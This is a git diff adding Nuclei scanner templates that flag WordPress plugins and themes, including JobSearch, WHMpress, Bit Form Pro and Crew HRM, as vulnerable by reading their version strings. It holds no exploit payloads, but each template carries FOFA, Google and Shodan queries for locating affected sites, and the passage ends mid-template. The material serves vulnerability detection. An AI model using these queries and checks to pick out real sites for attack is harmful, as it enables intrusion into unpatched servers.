+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43244
+ metadata:
+ fofa-query: "wp-content/themes/houzez/"
+ google-query: inurl:"/wp-content/themes/houzez/"
+ shodan-query: 'vuln:CVE-2024-43244'
+ tags: cve,wordpress,wp-theme,houzez,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/houzez/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "houzez"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml b/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml
new file mode 100644
index 0000000000..9c4f91cdcd
--- /dev/null
+++ b/poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d
+
+info:
+ name: >
+ JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+ The JobSearch WP Job Board plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.3.4. This is due to the plugin not properly validating identity on login functionality. This makes it possible for unauthenticated attackers to gain access to accounts they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43245
+ metadata:
+ fofa-query: "wp-content/plugins/wp-jobsearch/"
+ google-query: inurl:"/wp-content/plugins/wp-jobsearch/"
+ shodan-query: 'vuln:CVE-2024-43245'
+ tags: cve,wordpress,wp-plugin,wp-jobsearch,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-jobsearch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml b/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml
new file mode 100644
index 0000000000..fb7e57c898
--- /dev/null
+++ b/poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868
+
+info:
+ name: >
+ WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WHMpress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 6.2-revision-5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43246
+ metadata:
+ fofa-query: "wp-content/plugins/whmpress/"
+ google-query: inurl:"/wp-content/plugins/whmpress/"
+ shodan-query: 'vuln:CVE-2024-43246'
+ tags: cve,wordpress,wp-plugin,whmpress,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "whmpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2-revision-5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml b/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
new file mode 100644
index 0000000000..16a787d620
--- /dev/null
+++ b/poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43247-0624f0bab17c71db9707db1533c1022b
+
+info:
+ name: >
+ WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43247
+ metadata:
+ fofa-query: "wp-content/plugins/whmpress/"
+ google-query: inurl:"/wp-content/plugins/whmpress/"
+ shodan-query: 'vuln:CVE-2024-43247'
+ tags: cve,wordpress,wp-plugin,whmpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "whmpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2-revision-5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml b/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml
new file mode 100644
index 0000000000..d726b7c130
--- /dev/null
+++ b/poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Unauthenticated Arbitrary File Deletion
+ author: topscoder
+ severity: critical
+ description: >
+ The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 2.6.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7a09288c-b8de-4674-9f96-d26ff3c7d917?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43248
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:CVE-2024-43248'
+ tags: cve,wordpress,wp-plugin,bitformpro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml b/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml
new file mode 100644
index 0000000000..2781169a3a
--- /dev/null
+++ b/poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Bit Form Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3b9d15-f6a9-4d1c-ada5-8c48add839a2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-43249
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:CVE-2024-43249'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml b/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml
new file mode 100644
index 0000000000..e711939f1c
--- /dev/null
+++ b/poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The Bit Form Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/525a2180-3643-4f78-aafd-99a546bac363?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-43250
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:CVE-2024-43250'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml b/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml
new file mode 100644
index 0000000000..bf61558400
--- /dev/null
+++ b/poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The bitformpro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43251
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:CVE-2024-43251'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml b/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml
new file mode 100644
index 0000000000..641ccac8ab
--- /dev/null
+++ b/poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691
+
+info:
+ name: >
+ Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Employee, Leave and Recruitment Management System – Crew HRM plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.1 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43252
+ metadata:
+ fofa-query: "wp-content/plugins/hr-management/"
+ google-query: inurl:"/wp-content/plugins/hr-management/"
+ shodan-query: 'vuln:CVE-2024-43252'
+ tags: cve,wordpress,wp-plugin,hr-management,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "hr-management"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml b/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml
new file mode 100644
index 0000000000..97988cd2af
--- /dev/null
+++ b/poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/195788de-129e-4112-bcab-a7835c8164ca?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43253
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-43253'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml b/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml
new file mode 100644
index 0000000000..221d159b9b
--- /dev/null
+++ b/poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43254-45b63d56497d30988092c35280a0f346
+
+info:
+ name: >
+ Smart Online Order for Clover <= 1.5.6 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Smart Online Order for Clover plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/34d990b6-3021-45d4-9ecd-cfabb7fbc96c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43254
+ metadata:
+ fofa-query: "wp-content/plugins/clover-online-orders/"
+ google-query: inurl:"/wp-content/plugins/clover-online-orders/"
+ shodan-query: 'vuln:CVE-2024-43254'
+ tags: cve,wordpress,wp-plugin,clover-online-orders,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clover-online-orders/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clover-online-orders"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml b/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml
new file mode 100644
index 0000000000..f0fec03f0c
--- /dev/null
+++ b/poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d
+
+info:
+ name: >
+ MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43255
+ metadata:
+ fofa-query: "wp-content/plugins/mybooktable/"
+ google-query: inurl:"/wp-content/plugins/mybooktable/"
+ shodan-query: 'vuln:CVE-2024-43255'
+ tags: cve,wordpress,wp-plugin,mybooktable,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mybooktable"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml b/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml
new file mode 100644
index 0000000000..2f933d3049
--- /dev/null
+++ b/poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76
+
+info:
+ name: >
+ Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43256
+ metadata:
+ fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/"
+ google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/"
+ shodan-query: 'vuln:CVE-2024-43256'
+ tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leopard-wordpress-offload-media"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.36')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml b/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml
new file mode 100644
index 0000000000..31d84f3d2f
--- /dev/null
+++ b/poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1
+
+info:
+ name: >
+ Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The Leopard - WordPress Offload Media plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.36. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43257
+ metadata:
+ fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/"
+ google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/"
+ shodan-query: 'vuln:CVE-2024-43257'
+ tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leopard-wordpress-offload-media"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.36')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml b/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml
new file mode 100644
index 0000000000..f0e501ee97
--- /dev/null
+++ b/poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42
+
+info:
+ name: >
+ Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Store Locator Plus® for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2311.17.01. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43258
+ metadata:
+ fofa-query: "wp-content/plugins/store-locator-le/"
+ google-query: inurl:"/wp-content/plugins/store-locator-le/"
+ shodan-query: 'vuln:CVE-2024-43258'
+ tags: cve,wordpress,wp-plugin,store-locator-le,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt"
+
+ extractors:
